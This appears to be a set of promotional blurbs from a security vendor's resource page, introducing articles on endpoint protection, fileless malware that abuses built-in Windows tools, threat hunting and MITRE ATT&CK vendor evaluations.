How credible is the threat, and how do we stop it?
In order to address the evolving threat landscape, the security industry has turned to more comprehensive endpoint protection platforms. What are they?
Unlike attacks carried out using traditional malware, fileless malware attacks don’t entail attackers installing software on a victim’s machine. Instead, tools that are built-in to Windows are hijacked by adversaries and used to carry out attacks. Essentially, Windows is turned against itself.
In Q1 2018, fileless attacks were up 94%. Learn about what fileless malware is with common examples from the Cybereason Nocturnus team's research.
Many find the process of threat hunting to be too demanding. What are you supposed to hunt? Where do you even begin?
During the recent MITRE evaluations, it became apparent that many security vendors, while able to detect threats, were doing so well after the fact. It's important to consider what these delayed detections would mean for a SOC experiencing a real breach.
The MITRE ATT&CK framework is a complex solution to a complex problem. Rather than simply scoring vendors on a linear scale, it offers a more profound view of capabilities, applicability, and use-case. This is what you need to know about the way MITRE uses ATT&CK to evaluate security vendors, and how threat hunting factors into the ATT&CK framework.